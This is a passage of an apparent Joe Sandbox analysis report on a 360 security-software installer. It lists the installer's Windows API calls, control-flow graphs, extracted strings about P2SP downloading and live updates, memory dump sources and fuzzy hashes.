                                                                                                                                                                        • Part of subcall function 001CCF23: GetProcAddress.KERNEL32(?,?), ref: 001CCF2B
                                                                                                                                                                        • Part of subcall function 001CCF38: GetProcAddress.KERNEL32(?,?), ref: 001CCF40
                                                                                                                                                                        • Part of subcall function 001CCF4D: GetProcAddress.KERNEL32(?,?), ref: 001CCF55
                                                                                                                                                                        • Part of subcall function 001CCF62: GetProcAddress.KERNEL32(?,?), ref: 001CCF6A
                                                                                                                                                                        • Part of subcall function 001CCF77: GetProcAddress.KERNEL32(?,?), ref: 001CCF7F
                                                                                                                                                                        • Part of subcall function 001CCF8C: GetProcAddress.KERNEL32(?,?), ref: 001CCF94
                                                                                                                                                                        • Part of subcall function 001CCFA1: GetProcAddress.KERNEL32(?,?), ref: 001CCFA9
                                                                                                                                                                        • Part of subcall function 001CCFB6: GetProcAddress.KERNEL32(?,?), ref: 001CCFBE
                                                                                                                                                                        • Part of subcall function 001CCFCB: GetProcAddress.KERNEL32(?,?), ref: 001CCFD3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc$FileMove$H_prolog3$CreateDirectory
                                                                                                                                                                      • String ID: CreateP2SPTask$DLL$GetFinishMessage$Init$Login$QueryTask$RemoveTask$SetConfigInfo$SetP2spOption$StartTask$StopSeed$StopTask$Uninit$UpdateRegInfo$\360P2SP.dll$\liveupdatelog$\liveupdatelog\P2SP_360installer.log$liveupdatelog
                                                                                                                                                                      • API String ID: 2807886459-1040481394
                                                                                                                                                                      • Opcode ID: 17734babcb0a0d735fa89f28dc3ee14061fc50a83812fffa2f0fcfe64f1550fb
                                                                                                                                                                      • Instruction ID: 502768be226ece3bac5197c31a2fd5d28151ddbbab1bd52655c51187fc539e32
                                                                                                                                                                      • Opcode Fuzzy Hash: 17734babcb0a0d735fa89f28dc3ee14061fc50a83812fffa2f0fcfe64f1550fb
                                                                                                                                                                      • Instruction Fuzzy Hash: 4061AE72640714BBDB20EBA0DC46FAEB3B9AF35B10F40462CF556A25E1DB60ED148B60

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 5F4FC7DF
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F4FC85B
                                                                                                                                                                      • _memset.LIBCMT ref: 5F4FC964
                                                                                                                                                                        • Part of subcall function 5F5140CF: _memset.LIBCMT ref: 5F514102
                                                                                                                                                                        • Part of subcall function 5F5140CF: wvnsprintfW.SHLWAPI(?,000003FF,?,?), ref: 5F51411D
                                                                                                                                                                        • Part of subcall function 5F4D9134: _wcslen.LIBCMT ref: 5F4D913B
                                                                                                                                                                        • Part of subcall function 5F4DD55B: _wcslen.LIBCMT ref: 5F4DD562
                                                                                                                                                                        • Part of subcall function 5F4ED06F: __EH_prolog3.LIBCMT ref: 5F4ED08E
                                                                                                                                                                        • Part of subcall function 5F4ED06F: _wcslen.LIBCMT ref: 5F4ED0C6
                                                                                                                                                                        • Part of subcall function 5F4ED06F: __wcsnicmp.LIBCMT ref: 5F4ED0D1
                                                                                                                                                                        • Part of subcall function 5F4ED06F: _wcslen.LIBCMT ref: 5F4ED0DE
                                                                                                                                                                        • Part of subcall function 5F4ED06F: _wcslen.LIBCMT ref: 5F4ED10E
                                                                                                                                                                        • Part of subcall function 5F51405E: _memset.LIBCMT ref: 5F514091
                                                                                                                                                                        • Part of subcall function 5F51405E: wvnsprintfW.SHLWAPI(?,000003FF,5F5BC288,5F4FE1F9), ref: 5F5140AC
                                                                                                                                                                      Strings
                                                                                                                                                                      • [%d.] ErrorCode = %d(%s) PDownURL = %s, xrefs: 5F4FCA05
                                                                                                                                                                      • [%d.] DUQuota = %d Liveupdate360:%d, xrefs: 5F4FCC5C
                                                                                                                                                                      • [%d.] Delete mem File, xrefs: 5F4FCFA3
                                                                                                                                                                      • [%d.] discard resume mem, xrefs: 5F4FCFD7
                                                                                                                                                                      • [%d.] FileName=%s ErrorCode= %d(%s), xrefs: 5F4FCF51
                                                                                                                                                                      • 360tray, xrefs: 5F4FCB2E
                                                                                                                                                                      • [%d.] ErrorCode = %d(%s), xrefs: 5F4FCD62
                                                                                                                                                                      • ,360sdupd,360tray,360leakfixer,360safe,softmanager,360netcfg,seup,360entclient,softmgr,sdis,, xrefs: 5F4FCA7A, 5F4FCAC3
                                                                                                                                                                      • [%d.] AppName=%s IsSkipEnt:%d, xrefs: 5F4FCAEE
                                                                                                                                                                      • [%d.] ErrorCode = %d(%s), xrefs: 5F4FCDC9
                                                                                                                                                                      • [%d.] ErrorCode = %d(%s), , xrefs: 5F4FCEF2
                                                                                                                                                                      • [%d.] URL = %s File=%s, xrefs: 5F4FC97D
                                                                                                                                                                      • [%d.] EntModuleList=%s, xrefs: 5F4FCACB
                                                                                                                                                                      • [%d.]dl DownType:%d P2pDelay:%d.SkipEnt:%d, xrefs: 5F4FCAB8
                                                                                                                                                                      • .P2P, xrefs: 5F4FC9B6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcslen$_memset$H_prolog3wvnsprintf$CountTick__wcsnicmp
                                                                                                                                                                      • String ID: ,360sdupd,360tray,360leakfixer,360safe,softmanager,360netcfg,seup,360entclient,softmgr,sdis,$.P2P$360tray$[%d.] AppName=%s IsSkipEnt:%d$[%d.] DUQuota = %d Liveupdate360:%d$[%d.] Delete mem File$[%d.] EntModuleList=%s$[%d.] ErrorCode = %d(%s)$[%d.] ErrorCode = %d(%s)$[%d.] ErrorCode = %d(%s) PDownURL = %s$[%d.] ErrorCode = %d(%s), $[%d.] FileName=%s ErrorCode= %d(%s)$[%d.] URL = %s File=%s$[%d.] discard resume mem$[%d.]dl DownType:%d P2pDelay:%d.SkipEnt:%d
                                                                                                                                                                      • API String ID: 3392004093-4225084922
                                                                                                                                                                      • Opcode ID: ded15e357e081382699b01ead2ea524c44df1abbbb4fbd63e0032255b09a22aa
                                                                                                                                                                      • Instruction ID: 4e145669af95d8a2b75738c679832cfb7c11928ec5bfb110e5fed09a363d21e6
                                                                                                                                                                      • Opcode Fuzzy Hash: ded15e357e081382699b01ead2ea524c44df1abbbb4fbd63e0032255b09a22aa
                                                                                                                                                                      • Instruction Fuzzy Hash: 61427AB0901B00DFDB259FB5C840A9AFBF5EF94311F14891FE6AB863A1D771A640CB91

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateSolidBrush.GDI32(00FFFFFF), ref: 001B6F99
                                                                                                                                                                        • Part of subcall function 001B65A6: __EH_prolog3.LIBCMT ref: 001B65AD
                                                                                                                                                                        • Part of subcall function 001B65A6: GetDlgItem.USER32(?,00000403), ref: 001B65D5
                                                                                                                                                                        • Part of subcall function 001B65A6: GetDlgItem.USER32(?,000003EF), ref: 001B665A
                                                                                                                                                                        • Part of subcall function 001B65A6: GetDlgItem.USER32(?,000003F1), ref: 001B66B4
                                                                                                                                                                        • Part of subcall function 001B65A6: GetDlgItem.USER32(?,00000411), ref: 001B66E7
                                                                                                                                                                      • MoveWindow.USER32(?,000000D7,000000A7,000000AF,00000050,00000001), ref: 001B6FCB
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 001B6FE1
                                                                                                                                                                      • MoveWindow.USER32(?,00000212,0000013E,00000032,00000014,00000001), ref: 001B6FFD
                                                                                                                                                                      • MoveWindow.USER32(?,00000027,00000008,00000090,0000001E,00000001), ref: 001B7012
                                                                                                                                                                      • MoveWindow.USER32(?,0000003C,0000003F,00000046,00000014,00000001,?,00000027,00000008,00000131,PNG), ref: 001B7041
                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 001B704D
                                                                                                                                                                        • Part of subcall function 001960A3: ScreenToClient.USER32(?,?), ref: 001960B5
                                                                                                                                                                        • Part of subcall function 001960A3: ScreenToClient.USER32(?,?), ref: 001960C1
                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 001B7065
                                                                                                                                                                        • Part of subcall function 00177EB5: __EH_prolog3.LIBCMT ref: 00177EBC
                                                                                                                                                                      • SendMessageW.USER32(?,00000030,?,00000001), ref: 001B707E
                                                                                                                                                                      • MoveWindow.USER32(?,?,0000003C,0000003C,0000001C,00000001), ref: 001B70D1
                                                                                                                                                                      • MoveWindow.USER32(?,?,00000050,00000109,00000014,00000001), ref: 001B70EC
                                                                                                                                                                      • MoveWindow.USER32(?,0000018E,00000050,00000050,00000014,00000001), ref: 001B7106
                                                                                                                                                                        • Part of subcall function 001B4B9F: GetWindowRect.USER32(?,?), ref: 001B4BBC
                                                                                                                                                                        • Part of subcall function 001B4B9F: GetWindowTextLengthW.USER32(?), ref: 001B4BD0
                                                                                                                                                                        • Part of subcall function 001B4B9F: GetDC.USER32(?), ref: 001B4BDB
                                                                                                                                                                        • Part of subcall function 001B4B9F: _memset.LIBCMT ref: 001B4BEB
                                                                                                                                                                        • Part of subcall function 001B4B9F: GetTextMetricsW.GDI32(00000000,?), ref: 001B4BF8
                                                                                                                                                                        • Part of subcall function 001B4B9F: ReleaseDC.USER32(?,00000000), ref: 001B4C0B
                                                                                                                                                                        • Part of subcall function 001B4B9F: MoveWindow.USER32(?,?,?,00000000,?,00000001), ref: 001B4C2C
                                                                                                                                                                      • MoveWindow.USER32(?,0000003C,00000087,00000046,00000014,00000001), ref: 001B7129
                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 001B7139
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 001B7141
                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000,?), ref: 001B71A3
                                                                                                                                                                        • Part of subcall function 001A407A: ShowScrollBar.USER32(00000005,00000003,00000000,00000018,00000000,?,00000018), ref: 001A40A5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Move$Item$ClientRect$Show$H_prolog3ScreenText$BrushCreateLengthMessageMetricsReleaseScrollSendSolid_memset
                                                                                                                                                                      • String ID: <$CustomContrlList$PNG$X
                                                                                                                                                                      • API String ID: 3202666548-2186719467
                                                                                                                                                                      • Opcode ID: 417a8a1e468cd8c43e8121cf2dd3c33105a83c1bed422a2ae082e58502fc3a19
                                                                                                                                                                      • Instruction ID: 25ec7df2c9dc7e3bfbbb13131d0ed6e6c6a20f1ad6be73a352a86d28ca7f15d9
                                                                                                                                                                      • Opcode Fuzzy Hash: 417a8a1e468cd8c43e8121cf2dd3c33105a83c1bed422a2ae082e58502fc3a19
                                                                                                                                                                      • Instruction Fuzzy Hash: 70514271A40308BFEB21AFA4DC46FDEBBB9AF18B00F004415F645BA1E1DBB16A04CB51

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00198F8F
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00198F97
                                                                                                                                                                        • Part of subcall function 00197927: GetWindowLongW.USER32(-00000004,000000F0), ref: 00197949
                                                                                                                                                                        • Part of subcall function 00197927: SendMessageW.USER32(-00000004,0000007F,00000000,00000000), ref: 00197984
                                                                                                                                                                        • Part of subcall function 00197927: SendMessageW.USER32(-00000004,00000080,00000000,00000000), ref: 00197997
                                                                                                                                                                        • Part of subcall function 00197927: GetDlgItem.USER32(-00000004,0000E801), ref: 001979A4
                                                                                                                                                                        • Part of subcall function 00197927: IsWindow.USER32(00000000), ref: 001979AE
                                                                                                                                                                        • Part of subcall function 00197927: GetClientRect.USER32(-00000004,?), ref: 001979F8
                                                                                                                                                                        • Part of subcall function 00197927: GetDlgItem.USER32(-00000004,0000E801), ref: 00197A1F
                                                                                                                                                                        • Part of subcall function 00197927: IsWindow.USER32(00000000), ref: 00197A2C
                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00198FC2
                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EC,?), ref: 00198FCC
                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00198FF7
                                                                                                                                                                        • Part of subcall function 00196180: GetWindowLongW.USER32(?,000000F0), ref: 00196198
                                                                                                                                                                        • Part of subcall function 00196180: GetParent.USER32 ref: 001961AD
                                                                                                                                                                        • Part of subcall function 00196180: GetWindowRect.USER32(?,?), ref: 001961C7
                                                                                                                                                                        • Part of subcall function 00196180: GetWindowLongW.USER32(?,000000F0), ref: 001961DD
                                                                                                                                                                        • Part of subcall function 00196180: MonitorFromWindow.USER32(?,00000002), ref: 001961FC
                                                                                                                                                                      • GetSystemMetrics.USER32(0000000C), ref: 00199017
                                                                                                                                                                      • GetSystemMetrics.USER32(0000000B), ref: 0019901C
                                                                                                                                                                      • LoadImageW.USER32(?,00000080,00000001,00000000), ref: 00199026
                                                                                                                                                                      • SendMessageW.USER32(?,00000080,00000001,00000000), ref: 00199032
                                                                                                                                                                      • GetSystemMetrics.USER32(00000032), ref: 00199045
                                                                                                                                                                      • GetSystemMetrics.USER32(00000031), ref: 0019904A
                                                                                                                                                                      • LoadImageW.USER32(?,00000080,00000001,00000000), ref: 00199054
                                                                                                                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00199061
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00199067
                                                                                                                                                                        • Part of subcall function 00197EF3: EnterCriticalSection.KERNEL32(0024BC7C), ref: 00197F09
                                                                                                                                                                        • Part of subcall function 00197EF3: LeaveCriticalSection.KERNEL32(0024BC7C), ref: 00197F1E
                                                                                                                                                                        • Part of subcall function 0019749D: __recalloc.LIBCMT ref: 001974E3
                                                                                                                                                                        • Part of subcall function 00197530: __recalloc.LIBCMT ref: 00197576
                                                                                                                                                                        • Part of subcall function 00195AFC: _memset.LIBCMT ref: 00195B0D
                                                                                                                                                                        • Part of subcall function 00195AFC: SHAppBarMessage.SHELL32(00000000,?), ref: 00195B2F
                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00000001,?,?,?,?,?,?,?,002165E9,000000FF), ref: 001990D0
                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00000000,?,?,?,?,?,?,?,002165E9,000000FF), ref: 001990D7
                                                                                                                                                                      • PostMessageW.USER32(?,00003AB1,00000000,00000000), ref: 00199121
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Long$Message$MetricsSendSystem$CallbackCriticalDispatcherImageItemLoadRectSectionUser__recalloc$ClientCurrentEnterFromLeaveMonitorParentPostTextThread_memset
                                                                                                                                                                      • String ID: D!$PNG
                                                                                                                                                                      • API String ID: 2213159910-1994516575
                                                                                                                                                                      • Opcode ID: 142864490b41a2c690d500462387f3c949ef05940195b3eda6c7d89ca31b2703
                                                                                                                                                                      • Instruction ID: b57522bf359801b9de26d8e10d8f13a56652258f7d3dc09f281c6a347c1617af
                                                                                                                                                                      • Opcode Fuzzy Hash: 142864490b41a2c690d500462387f3c949ef05940195b3eda6c7d89ca31b2703
                                                                                                                                                                      • Instruction Fuzzy Hash: 3971AD71204204EFDB04EFA4DC89FAABBA9FF59354F110629F5518B2A1DB72E8148B61

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      control_flow_graph 993 1ce0d8-1ce145 call 1e5421 call 1e4550 SHGetValueW 998 1ce30f 993->998 999 1ce14b-1ce152 993->999 1001 1ce311-1ce333 call 1e4647 998->1001 999->998 1000 1ce158-1ce15b 999->1000 1000->998 1002 1ce161-1ce197 call 16b680 PathCombineW PathFileExistsW 1000->1002 1007 1ce1ad-1ce22c call 17cb91 * 2 call 1e4550 PathCombineW * 3 call 16e370 1002->1007 1008 1ce199-1ce1a8 call 16dd20 1002->1008 1019 1ce2b4-1ce2d8 call 1e4550 call 16e370 1007->1019 1020 1ce232-1ce240 call 16e370 1007->1020 1008->1001 1029 1ce2ec-1ce301 call 1cd748 1019->1029 1030 1ce2da 1019->1030 1020->1019 1026 1ce242-1ce253 call 16e370 1020->1026 1026->1019 1034 1ce255-1ce266 call 16e7d0 1026->1034 1037 1ce306-1ce30d 1029->1037 1032 1ce2df-1ce2e7 call 16c8e0 1030->1032 1032->1029 1034->1019 1040 1ce268-1ce289 GetProcAddress * 2 1034->1040 1037->1032 1041 1ce28b-1ce29e 1040->1041 1042 1ce2a3-1ce2a5 1040->1042 1041->1042 1047 1ce2a0 1041->1047 1043 1ce2ac-1ce2b0 1042->1043 1044 1ce2a7-1ce2a9 1042->1044 1043->1037 1046 1ce2b2 1043->1046 1044->1043 1046->1019 1047->1042
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001CE0F7
                                                                                                                                                                      • _memset.LIBCMT ref: 001CE11A
                                                                                                                                                                      • SHGetValueW.SHLWAPI(?,?,?,?,?,00000080,?,?,00000018), ref: 001CE13C
                                                                                                                                                                      • PathCombineW.SHLWAPI(?,?,?,?,?,?,00000018), ref: 001CE186
                                                                                                                                                                      • PathFileExistsW.SHLWAPI(?,?,?,00000018), ref: 001CE18F
                                                                                                                                                                      • _memset.LIBCMT ref: 001CE1DE
                                                                                                                                                                      • PathCombineW.SHLWAPI(?,?,360ver.dll,?,?,?,?,?,00000018), ref: 001CE1F5
                                                                                                                                                                      • PathCombineW.SHLWAPI(00000000,?,360Common.dll,?,?,?,?,?,00000018), ref: 001CE203
                                                                                                                                                                      • PathCombineW.SHLWAPI(?,?,360Base.dll,?,?,?,?,?,00000018), ref: 001CE214
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Get360SafeVersion), ref: 001CE274
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,IsBetaVersion), ref: 001CE281
                                                                                                                                                                      • _memset.LIBCMT ref: 001CE2C1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Path$Combine$_memset$AddressProc$ExistsFileH_prolog3Value
                                                                                                                                                                      • String ID: 0.0.0.0$360Base.dll$360Common.dll$360ver.dll$Get360SafeVersion$IsBetaVersion
                                                                                                                                                                      • API String ID: 2656314946-96710800
                                                                                                                                                                      • Opcode ID: 881b10ce590913c7543cc977e6dd85e2859635dddf5047164285aba53719b088
                                                                                                                                                                      • Instruction ID: dfc645d5ff710b024e3c67164268c340e0258ca30ae20ebd6d2c7cd5d1939a8b
                                                                                                                                                                      • Opcode Fuzzy Hash: 881b10ce590913c7543cc977e6dd85e2859635dddf5047164285aba53719b088
                                                                                                                                                                      • Instruction Fuzzy Hash: 75613976900689ABDF20EFA5DC89FEF77FCBB54700F00042AE51597181EB71A654CB50

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(FF4173A1,?,?,?,?,?,?,?,5F54E70B,000000FF), ref: 5F4D6E84
                                                                                                                                                                      • __snwprintf.LIBCMT ref: 5F4D6E9B
                                                                                                                                                                      • CreateMutexW.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,?,?,?,5F54E70B,000000FF), ref: 5F4D6EB5
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,5F54E70B,000000FF), ref: 5F4D6EC8
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,5F54E70B,000000FF), ref: 5F4D6ED8
                                                                                                                                                                      • _memset.LIBCMT ref: 5F4D6EF4
                                                                                                                                                                      • _swscanf.LIBCMT ref: 5F4D6F2B
                                                                                                                                                                      • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,5F54E70B,000000FF), ref: 5F4D6F45
                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,000005C0,?,?,?,?,?,?,?,?,?,?,?,?,5F54E70B), ref: 5F4D6F57
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 5F4D6F92
                                                                                                                                                                      • __swprintf.LIBCMT ref: 5F4D6FA9
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 5F4D6FD0
                                                                                                                                                                      • ReleaseMutex.KERNEL32(?,?,5F56CAE8), ref: 5F4D6FDE
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 5F4D7000
                                                                                                                                                                      • ReleaseMutex.KERNEL32(00000000), ref: 5F4D7023
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 5F4D702E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Mutex$CloseException@8HandleHeapProcessReleaseThrow$AllocCreateCurrentErrorLastObjectSingleWait__snwprintf__swprintf_memset_swscanf
                                                                                                                                                                      • String ID: %s %u$1830B7BD-F7A3-4c4d-989B-C004DE465EDE

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetWindowLongW.USER32(-00000004,000000F0), ref: 00197949
                                                                                                                                                                      • SendMessageW.USER32(-00000004,0000007F,00000000,00000000), ref: 00197984
                                                                                                                                                                      • SendMessageW.USER32(-00000004,00000080,00000000,00000000), ref: 00197997
                                                                                                                                                                      • GetDlgItem.USER32(-00000004,0000E801), ref: 001979A4
                                                                                                                                                                      • IsWindow.USER32(00000000), ref: 001979AE
                                                                                                                                                                      • GetClientRect.USER32(-00000004,?), ref: 001979F8
                                                                                                                                                                      • GetDlgItem.USER32(-00000004,0000E801), ref: 00197A1F
                                                                                                                                                                      • IsWindow.USER32(00000000), ref: 00197A2C
                                                                                                                                                                      • IsWindow.USER32(00000000), ref: 00197A66
                                                                                                                                                                      • GetWindowRect.USER32(00000000,00000000), ref: 00197A83
                                                                                                                                                                      • GetWindowRect.USER32(-00000004,000000FF), ref: 00197AF9
                                                                                                                                                                      • GetDlgItem.USER32(-00000004,000003E8), ref: 00197B7D
                                                                                                                                                                      • GetWindowRect.USER32(00000000,00000000), ref: 00197B96
                                                                                                                                                                      • MapWindowPoints.USER32(00000000,-00000004,00000000,00000002), ref: 00197BA6
                                                                                                                                                                      • MapWindowPoints.USER32(00000000,-00000004,00000000,00000002), ref: 00197A93
                                                                                                                                                                        • Part of subcall function 00196FE3: __recalloc.LIBCMT ref: 0019702D
                                                                                                                                                                      • GetClientRect.USER32(-00000004,000000FF), ref: 00197AE6
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Rect$Item$ClientMessagePointsSend$Long__recalloc
